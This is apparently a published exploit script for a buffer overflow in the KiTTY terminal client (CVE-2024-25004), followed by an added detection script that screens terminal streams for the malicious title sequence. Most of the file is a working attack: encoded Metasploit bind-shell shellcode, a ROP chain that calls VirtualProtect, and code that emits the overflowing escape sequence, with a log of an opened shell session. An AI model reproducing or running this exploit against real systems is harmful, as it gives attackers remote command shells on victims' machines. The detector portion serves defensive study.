# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
# Vendor Homepage: https://github.com/cyd01/KiTTY/=
# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
# Version: ≤ 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: CVE-2024-25004
#-------------------------------------------------------------------------------------#
# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY                                          #
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
# [*] Payload Handler Started as Job 1                                                #
# msf6 payload(windows/shell_bind_tcp) >                                              #
# [*] Started bind TCP handler against 192.168.100.28:4444                            #
# [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444)   #
#-------------------------------------------------------------------------------------#

import sys
import os
import struct

#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py  #
# windows/shell_bind_tcp - 355 bytes                                                  #
# https://metasploit.com/                                                             #
# Encoder: x86/shikata_ga_nai                                                         #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                    #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true,                         #
# AutoVerifySession=true                                                              #
#-------------------------------------------------------------------------------------#
buf = b""
buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"


def shellcode():
    # Stack adjustment stub followed by the encoded payload, NOP-padded to 1042 bytes.
    sc = b''
    sc += b'\xBB\x44\x24\x44\x44'  # mov ebx,0x44442444
    sc += b'\xB8\x44\x44\x44\x44'  # mov eax,0x44444444
    sc += b'\x29\xD8'              # sub eax,ebx   (eax = 0x2000)
    sc += b'\x29\xC4'              # sub esp,eax   (esp -= 0x2000)
    sc += buf
    sc += b'\x90' * (1042 - len(sc))
    assert len(sc) == 1042
    return sc


def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        #[---INFO:gadgets_to_set_esi:---]
        0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
        0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
        0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
        #[---INFO:gadgets_to_set_ebp:---]
        0x00429953,  # POP EBP # RETN [kitty.exe]
        0x005405b0,  # PUSH ESP; RETN 0 [kitty.exe]
        #[---INFO:gadgets_to_set_ebx:---]
        0x0049d9f9,  # POP EBX # RETN [kitty.exe]
        0x00000201,  # 0x00000201-> ebx
        #[---INFO:gadgets_to_set_edx:---]
        0x00430dce,  # POP EDX # RETN [kitty.exe]
        0x00000040,  # 0x00000040-> edx
        #[---INFO:gadgets_to_set_ecx:---]
        0x005ac58c,  # POP ECX # RETN [kitty.exe]
        0x004d81d9,  # &Writable location [kitty.exe]
        #[---INFO:gadgets_to_set_edi:---]
        0x004fa404,  # POP EDI # RETN [kitty.exe]
        0x005a2001,  # RETN (ROP NOP) [kitty.exe]
        #[---INFO:gadgets_to_set_eax:---]
        0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
        0x90909090,  # nop
        0x41414141,  # Filler (compensate)
        #[---INFO:pushad:---]
        0x005dfbac,  # PUSHAD # RETN [kitty.exe]
    ]
    return b''.join(struct.pack('<I', _) for _ in rop_gadgets)


rop_chain = create_rop_chain()

#-------------------------------------------------------------------------------------#
# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d                                              #
# Return Address Information: 0x00529720 : {pivot 324 / 0x144} :                      #
# ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN                          #
# ** [kitty.exe] ** |startnull {PAGE_EXECUTE_READWRITE}                               #
# Shellcode size at ESP: 1042 bytes                                                   #
#-------------------------------------------------------------------------------------#
return_address = struct.pack('<I', 0x00529720)  # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** |startnull {PAGE_EXECUTE_READWRITE}
rop_chain_padding = b'\x90' * 27
nops = b'\x90' * 88

# OSC 0 title sequence: ESC ] 0 ; __dt:<host>:<user> BEL, with the overflow in the user field.
escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\xE9\x3D\xFA\xFF\xFF'  # jmp $eip-1471
escape_sequence += nops + b'\007'

stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
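The trigger above is an OSC 0 title escape (ESC ] 0 ; __dt:<host>:<user> BEL) whose username field is far larger than any real username and full of non-printable bytes, which makes it easy to screen for in captured terminal traffic or proxy logs. The detector below is an added example and is not part of the original exploit; the 256-byte username threshold and the two sample byte streams are assumptions constructed for it.

```python
import re

# Matches ESC ] 0 ; __dt:<host>:<user> terminated by BEL or ESC \ (ST).
# The layout is taken from the escape_sequence built above; DOTALL lets the
# user field span arbitrary bytes.
OSC_DT_RE = re.compile(rb'\x1b\]0;__dt:([^:\x07\x1b]*):(.*?)(?:\x07|\x1b\\)', re.DOTALL)
MAX_USER_LEN = 256  # assumption: no legitimate username is longer than this


def find_dt_sequences(stream: bytes):
    """Return every (host, user) pair carried by a __dt title sequence."""
    return [(m.group(1), m.group(2)) for m in OSC_DT_RE.finditer(stream)]


def classify_user_field(user: bytes):
    """Return the reasons a username field looks like an overflow attempt."""
    reasons = []
    if len(user) > MAX_USER_LEN:
        reasons.append(f"length {len(user)} exceeds {MAX_USER_LEN}")
    if any(b < 0x20 or b > 0x7e for b in user):
        reasons.append("non-printable bytes in username")
    return reasons


def scan(stream: bytes):
    """Return [(host, user_length, reasons)] for each sequence with findings."""
    findings = []
    for host, user in find_dt_sequences(stream):
        reasons = classify_user_field(user)
        if reasons:
            findings.append((host, len(user), reasons))
    return findings


# Constructed samples: a normal title update and an inert stream that mimics
# the exploit's shape (1042 filler bytes plus a 4-byte return slot, no payload).
BENIGN = b'hello\x1b]0;__dt:localhost:alice\x07world'
SUSPECT = b'\x1b]0;__dt:localhost:' + b'\x90' * 1042 + b'\x41\x41\x41\x41' + b'\x07'

if __name__ == '__main__':
    for finding in scan(BENIGN + SUSPECT):
        print(finding)
```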